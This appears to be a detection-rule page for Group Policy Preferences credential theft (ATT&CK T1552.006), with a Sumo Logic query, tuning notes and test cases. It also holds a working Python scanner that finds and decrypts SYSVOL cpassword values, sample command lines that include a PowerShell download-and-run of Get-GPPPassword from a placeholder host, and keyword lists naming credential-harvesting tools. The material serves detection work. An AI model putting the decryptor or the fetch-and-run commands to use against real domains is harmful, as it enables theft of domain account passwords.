T1552.006 Sumo Logic CSE · Sumo

Detect Group Policy Preferences in Sumo Logic CSE

Adversaries may search Group Policy Preferences (GPP) for unsecured credentials. GPP lets administrators push local accounts, scheduled tasks, services, data sources, printers and mapped drives through Group Policy, including the passwords for them. Those settings are written to SYSVOL as XML files (Groups.xml, ScheduledTasks.xml, Services.xml, DataSources.xml, Printers.xml, Drives.xml) in which the password sits in a cpassword attribute, AES-256 encrypted with a single fixed key that Microsoft itself documents in the MS-GPPREF protocol specification. Because SYSVOL is readable by every authenticated domain user, any cpassword found there is trivially decryptable. MS14-025 (May 2014) removed the ability to set new passwords through GPP but left existing XML files in place, so stale cpassword values can survive in SYSVOL for years. Tools include PowerSploit's Get-GPPPassword, Metasploit's post/windows/gather/credentials/gpp module, and gpprefdecrypt.py. APT33 and Wizard Spider have used this technique, and SILENTTRINITY includes a module for it.
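As an added worked example (not code from this page, nor from PowerSploit, Metasploit or gpprefdecrypt.py), the following Python scanner does what those tools do at the file level: it walks GPP XML, pulls every cpassword attribute together with the account it belongs to, restores the base64 padding that GPP strips, and checks that the ciphertext is AES-block aligned. decrypt_cpassword() applies the published key with a zero IV; it assumes the third-party cryptography package is installed and imports it only when called. The Groups.xml and ScheduledTasks.xml samples at the bottom are constructed for the example, with placeholder cpassword values rather than real ciphertext.

```python
"""Discover (and optionally decrypt) GPP cpassword values in Group Policy
Preference XML files, as Get-GPPPassword and gpprefdecrypt.py do.

Added example for this page; not code from the page or from any tool it names.
Discovery needs only the standard library. decrypt_cpassword() additionally
needs the third-party `cryptography` package (an assumption) and imports it
only when called.
"""
import base64
import os
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Union

# 32-byte AES-256 key that Microsoft documents in the MS-GPPREF specification
# under "Password Encryption"; the IV is sixteen zero bytes.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
GPP_AES_IV = b"\x00" * 16

# Attributes that name the account a cpassword belongs to (varies by preference type).
ACCOUNT_ATTRS = ("username", "runas", "accountname")


@dataclass
class Finding:
    file: str
    item: str          # preference element owning the password: User, Task, NTService...
    account: str       # value of userName / runAs / accountName ("" if absent)
    cpassword: str     # base64 exactly as written in the XML (GPP strips '=' padding)
    ciphertext: bytes  # decoded bytes; AES-CBC output, so a multiple of 16 bytes


def repad_base64(value: str) -> str:
    """GPP writes base64 without '=' padding; restore it for b64decode()."""
    return value + "=" * (-len(value) % 4)


def find_cpasswords(xml_text: Union[str, bytes], file_name: str = "<inline>") -> List[Finding]:
    """Return every non-empty cpassword attribute in one GPP XML document."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings: List[Finding] = []
    for elem in root.iter():
        attrs = {k.lower(): v for k, v in elem.attrib.items()}
        value = attrs.get("cpassword")
        if not value:
            continue  # attribute absent, or empty because the password was cleared
        ciphertext = base64.b64decode(repad_base64(value))
        if len(ciphertext) % 16:
            continue  # not block-aligned, so not AES-CBC as GPP writes it
        owner = parent_of.get(elem, elem).tag  # cpassword sits on <Properties>
        account = next((attrs[a] for a in ACCOUNT_ATTRS if attrs.get(a)), "")
        findings.append(Finding(file_name, owner, account, value, ciphertext))
    return findings


def scan_directory(root_dir: str) -> List[Finding]:
    """Walk a SYSVOL tree (a local copy or the share itself) and collect findings."""
    results: List[Finding] = []
    for dirpath, _, names in os.walk(root_dir):
        for name in names:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    results.extend(find_cpasswords(fh.read(), path))
            except (ET.ParseError, OSError, ValueError):
                continue  # non-GPP XML, malformed base64, or unreadable file
    return results


def decrypt_cpassword(cpassword: str) -> str:
    """AES-256-CBC with the published key, PKCS#7 padding, UTF-16LE plaintext.
    Requires `pip install cryptography`; imported lazily so discovery works without it."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    ciphertext = base64.b64decode(repad_base64(cpassword))
    decryptor = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(GPP_AES_IV)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return (unpadder.update(padded) + unpadder.finalize()).decode("utf-16-le")


# Constructed samples in the shape of a Groups.xml and a ScheduledTasks.xml from
# SYSVOL. The cpassword is placeholder base64 (16 zero bytes, padding stripped),
# not real ciphertext, so it decodes but does not decrypt to a meaningful password.
SAMPLE_CPASSWORD = "A" * 22
SAMPLE_GROUPS_XML = """<Groups>
  <User name="LocalAdmin" image="2">
    <Properties action="U" newName="" fullName="" description="" cpassword="@CP@"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>""".replace("@CP@", SAMPLE_CPASSWORD)
SAMPLE_TASKS_XML = """<ScheduledTasks>
  <Task name="Backup">
    <Properties action="C" name="Backup" runAs="CORP\\svc_backup" cpassword="@CP@"/>
  </Task>
</ScheduledTasks>""".replace("@CP@", SAMPLE_CPASSWORD)


if __name__ == "__main__":
    for f in (find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml")
              + find_cpasswords(SAMPLE_TASKS_XML, "ScheduledTasks.xml")):
        print(f"{f.file}: <{f.item}> account={f.account!r} ciphertext={len(f.ciphertext)} bytes")
```

Point scan_directory() at a mounted SYSVOL (or an offline copy from a backup) to get the same inventory Get-GPPPassword prints, then feed each Finding.cpassword to decrypt_cpassword(); an empty cpassword attribute is skipped because MS14-025-era cleanup commonly blanks the value rather than deleting the file.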

MITRE ATT&CK

Tactic
Credential Access
Technique
T1552 Unsecured Credentials
Sub-technique
T1552.006 Group Policy Preferences
Canonical reference
https://attack.mitre.org/techniques/T1552/006/

Sumo Detection Query

Sumo Logic CSE (Sumo)
(_sourceCategory=*windows* OR _sourceCategory=*sysmon* OR _sourceCategory=*wineventlog*)
| where EventCode in ("1", "5140", "5145")
// Parse GPP-relevant command-line indicators from Sysmon process creation (Event ID 1).
// Get-SiteListPassword decrypts McAfee SiteList.xml rather than GPP data, but ships in
// the same PowerSploit module, so it is kept as an indicator of the toolkit.
| parse regex field=CommandLine "(?i)(?<gpp_keyword>Get-GPPPassword|Get-CachedGPPPassword|Find-GPOPassword|Get-GPPAutologon|Get-SiteListPassword|cpassword|gpprefdecrypt)" nodrop
// Parse SYSVOL XML access pattern from command line
| parse regex field=CommandLine "(?i)(?<sysvol_cmd>SYSVOL)" nodrop
| parse regex field=CommandLine "(?i)(?<xml_ext>\.xml)" nodrop
// Parse GPP XML filenames from share access events (Drives.xml also carries cpassword)
| parse regex field=Object_Name "(?i)(?<gpp_file>Groups\.xml|ScheduledTasks\.xml|DataSources\.xml|Printers\.xml|Services\.xml|Drives\.xml)" nodrop
// Parse SYSVOL share name
| parse regex field=Share_Name "(?i)(?<sysvol_share>SYSVOL)" nodrop
// Filter: keep only events matching at least one GPP indicator
| where !isNull(gpp_keyword)
    OR (!isNull(sysvol_cmd) AND !isNull(xml_ext))
    OR !isNull(gpp_file)
    OR !isNull(sysvol_share)
// Exclude machine accounts (trailing $), SYSTEM and anonymous logons from share-access events.
// A quoted matches pattern is a wildcard in Sumo, not a regex, hence "*$".
| where !(EventCode in ("5140","5145") AND (Account_Name matches "*$" OR Account_Name = "SYSTEM" OR Account_Name = "ANONYMOUS LOGON"))
// Classify detection pattern. gpp_keyword was captured case-insensitively, so the
// exact-match branches compare its lower-cased form; regex matches use /.../ delimiters.
| if (!isNull(gpp_keyword) AND gpp_keyword matches /(?i)^(Get-GP|Find-GPO)/,
      "PowerSploit_GPP",
      if (!isNull(gpp_keyword) AND toLowerCase(gpp_keyword) = "cpassword",
          "GPP_CpasswordSearch",
          if (!isNull(gpp_keyword) AND toLowerCase(gpp_keyword) = "gpprefdecrypt",
              "GPP_DecryptionTool",
              if (!isNull(sysvol_cmd) AND !isNull(xml_ext),
                  "GPP_SYSVOLCommandSearch",
                  if (!isNull(gpp_file) OR !isNull(sysvol_share),
                      "GPP_XMLFileAccess",
                      "GPP_Other"))))) as AlertType
| fields _time, host, User, Account_Name, Image, CommandLine, Object_Name, Share_Name, AlertType
| sort by _time desc
Severity: high. Confidence: high.

Detects Group Policy Preferences credential harvesting via Sysmon and Windows Security event sources. Pattern 1 catches PowerSploit GPP module invocations (Get-GPPPassword, Get-CachedGPPPassword, Find-GPOPassword, Get-GPPAutologon) and the gpprefdecrypt decryption tool via Sysmon process create events. Pattern 2 identifies direct cpassword string references and SYSVOL+XML command-line combinations indicative of manual or scripted enumeration, such as a findstr or dir /s across the share. Pattern 3 uses Windows Security Events 5140/5145 to detect file-level access to GPP XML credential stores (Groups.xml, ScheduledTasks.xml, DataSources.xml, Printers.xml, Services.xml, Drives.xml) via SYSVOL shares. Machine accounts, SYSTEM and ANONYMOUS LOGON are excluded from share-access patterns. The nested if() chain assigns one AlertType per event in this order: PowerSploit_GPP, GPP_CpasswordSearch, GPP_DecryptionTool, GPP_SYSVOLCommandSearch, GPP_XMLFileAccess, with GPP_Other for a keyword hit (Get-SiteListPassword) that fits none of the named branches.
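To exercise the rule before deploying it, here is an added Python model of the query's matching and precedence logic (example code written for this page, not Sumo Logic code and not part of the rule). Field names follow the query; the events, hostnames and download URL are constructed. Running it shows two things the description above does not spell out: a plain 5140 SYSVOL share connection by an ordinary user already satisfies the sysvol_share branch, and Get-SiteListPassword falls through every named branch to GPP_Other.

```python
"""Offline model of the Sumo query's matching and classification logic.

Added example for this page; not Sumo Logic code and not part of the rule.
Field names (EventCode, CommandLine, Object_Name, Share_Name, Account_Name)
follow the query. All events below are constructed, not real telemetry.
"""
import re
from typing import Dict, List, Optional

Event = Dict[str, str]

GPP_KEYWORD = re.compile(
    r"Get-GPPPassword|Get-CachedGPPPassword|Find-GPOPassword|Get-GPPAutologon"
    r"|Get-SiteListPassword|cpassword|gpprefdecrypt",
    re.IGNORECASE,
)
POWERSPLOIT_GPP = re.compile(r"^(Get-GP|Find-GPO)", re.IGNORECASE)
GPP_FILE = re.compile(
    r"Groups\.xml|ScheduledTasks\.xml|DataSources\.xml|Printers\.xml"
    r"|Services\.xml|Drives\.xml",
    re.IGNORECASE,
)
SYSVOL = re.compile(r"SYSVOL", re.IGNORECASE)
XML_EXT = re.compile(r"\.xml", re.IGNORECASE)
SHARE_EVENTS = {"5140", "5145"}
EXCLUDED_ACCOUNTS = {"SYSTEM", "ANONYMOUS LOGON"}


def classify(ev: Event) -> Optional[str]:
    """Return the AlertType the query would assign, or None when it drops the event."""
    code = ev.get("EventCode", "")
    if code != "1" and code not in SHARE_EVENTS:
        return None
    cmd = ev.get("CommandLine", "")
    m = GPP_KEYWORD.search(cmd)          # parse regex keeps the first match only
    keyword = m.group(0) if m else None
    sysvol_cmd = bool(SYSVOL.search(cmd))
    xml_ext = bool(XML_EXT.search(cmd))
    gpp_file = bool(GPP_FILE.search(ev.get("Object_Name", "")))
    sysvol_share = bool(SYSVOL.search(ev.get("Share_Name", "")))

    # Keep only events with at least one GPP indicator.
    if not (keyword or (sysvol_cmd and xml_ext) or gpp_file or sysvol_share):
        return None
    # Drop share-access events from machine accounts, SYSTEM and anonymous logons.
    acct = ev.get("Account_Name", "")
    if code in SHARE_EVENTS and (acct.endswith("$") or acct in EXCLUDED_ACCOUNTS):
        return None
    # Same precedence as the nested if() chain in the query.
    if keyword and POWERSPLOIT_GPP.match(keyword):
        return "PowerSploit_GPP"
    if keyword and keyword.lower() == "cpassword":   # case-insensitive, as the capture is
        return "GPP_CpasswordSearch"
    if keyword and keyword.lower() == "gpprefdecrypt":
        return "GPP_DecryptionTool"
    if sysvol_cmd and xml_ext:
        return "GPP_SYSVOLCommandSearch"
    if gpp_file or sysvol_share:
        return "GPP_XMLFileAccess"
    return "GPP_Other"   # e.g. Get-SiteListPassword: a keyword hit no earlier branch claims


def run(events: List[Event]) -> List[Optional[str]]:
    return [classify(e) for e in events]


# Constructed events in the shape the query sees after field extraction.
SYSVOL_GROUPS = r"\corp.example\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml"
SAMPLE_EVENTS: List[Event] = [
    {"EventCode": "1", "Account_Name": "CORP\\jdoe", "Image": r"C:\Windows\System32\findstr.exe",
     "CommandLine": r"findstr /S /I cPassword \\corp.example\sysvol\*.xml"},
    {"EventCode": "1", "Account_Name": "CORP\\jdoe",
     "CommandLine": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient).DownloadString("
                    "'https://files.example/Get-GPPPassword.ps1'); Get-GPPPassword\""},
    {"EventCode": "1", "Account_Name": "CORP\\jdoe",
     "CommandLine": r"cmd.exe /c dir /s \\dc01\SYSVOL\*.xml"},
    {"EventCode": "1", "Account_Name": "CORP\\jdoe",
     "CommandLine": "python.exe gpprefdecrypt.py AAAAAAAAAAAAAAAAAAAAAA"},
    {"EventCode": "1", "Account_Name": "CORP\\jdoe",
     "CommandLine": "powershell.exe -c Get-SiteListPassword"},
    {"EventCode": "5145", "Account_Name": "jdoe", "Share_Name": r"\\*\SYSVOL", "Object_Name": SYSVOL_GROUPS},
    {"EventCode": "5145", "Account_Name": "WS01$", "Share_Name": r"\\*\SYSVOL", "Object_Name": SYSVOL_GROUPS},
    {"EventCode": "5140", "Account_Name": "jdoe", "Share_Name": r"\\*\SYSVOL"},   # every logon does this
    {"EventCode": "1", "Account_Name": "CORP\\jdoe", "CommandLine": r"notepad.exe C:\Users\jdoe\notes.xml"},
    {"EventCode": "4688", "Account_Name": "CORP\\jdoe", "CommandLine": "findstr cpassword"},
]
EXPECTED = ["GPP_CpasswordSearch", "PowerSploit_GPP", "GPP_SYSVOLCommandSearch", "GPP_DecryptionTool",
            "GPP_Other", "GPP_XMLFileAccess", None, "GPP_XMLFileAccess", None, None]

if __name__ == "__main__":
    for ev, alert in zip(SAMPLE_EVENTS, run(SAMPLE_EVENTS)):
        subject = ev.get("CommandLine") or ev.get("Object_Name") or ev.get("Share_Name")
        print(f"{alert or '-':24} {subject}")
```

The first event deliberately uses "cPassword" to show why the query compares the lower-cased keyword; the eighth shows that the share-only branch alerts without any file name, which is what the tuning notes below are about.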

Data Sources

  • Sumo Logic Cloud SIEM
  • Sysmon (via Sumo Logic Windows collector)
  • Windows Security Event Log (via Sumo Logic Windows collector)

Required Tables

  • windows event log sources
  • sysmon sources

False Positives & Tuning

  • Normal Group Policy refresh (the Group Policy Client, gpsvc, hosted in svchost, and gpupdate) on every domain member reads GPP XML files from SYSVOL. Computer-side policy is read as the machine account (ending in $), which the filter excludes, but user-side policy is read in the logged-on user's context, so 5145 events on the DC for Groups.xml and similar files carry ordinary user names at every logon and refresh. Baseline these by source host and logon time, and watch for service accounts that do not end in $ but perform legitimate policy reads.
  • The sysvol_share branch on its own fires on any 5140 SYSVOL share connection by a non-machine account, which every interactive logon produces. If that is too noisy, drop the OR !isNull(sysvol_share) clause from the filter and rely on the Object_Name match against the GPP XML filenames, or restrict the share branch to accounts outside your normal user population.
  • Enterprise backup agents (Veeam, Commvault, Veritas) with domain-level access may traverse SYSVOL as part of Active Directory backup procedures; correlate alerts with backup job schedules and service account identities.
  • Red team or purple team exercises executing authorized GPP attack simulations generate true-positive alerts that should be suppressed rather than tuned out; keep a suppression window tied to the exercise schedule and the accounts involved.

Testing Methodology

Validate this detection against the 4 test cases below, drawn from Atomic Red Team. Each test lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Search SYSVOL for GPP Credentials with findstr

    Expected signal: Sysmon Event ID 1: findstr.exe with 'cpassword' and SYSVOL. Sysmon Event ID 3: outbound SMB connection to DC (port 445). Security Event ID 5140 on DC: share access to \\*\SYSVOL.

  2. Test 2: PowerSploit Get-GPPPassword

    Expected signal: Sysmon Event ID 1: powershell.exe with Get-GPPPassword and DownloadString. Sysmon Event ID 3: connection to SYSVOL on DC (port 445) AND outbound to GitHub for download. PowerShell ScriptBlock Log Event ID 4104 with Get-GPPPassword function.

  3. Test 3: Enumerate GPP XML Files in SYSVOL

    Expected signal: Sysmon Event ID 1: cmd.exe with 'dir /s' and SYSVOL. Sysmon Event ID 3: SMB connection to DC. Security Event ID 5140 on DC: SYSVOL share access.

  4. Test 4: Decrypt GPP cpassword with Python

    Expected signal: Sysmon Event ID 1: the decrypting interpreter (powershell.exe with AesManaged, or python.exe with the decryption script) with the cpassword value in the command line. PowerShell ScriptBlock Log Event ID 4104 showing the AES decryption logic when the PowerShell variant is used. No SYSVOL access is expected from this test; the ciphertext is supplied locally.

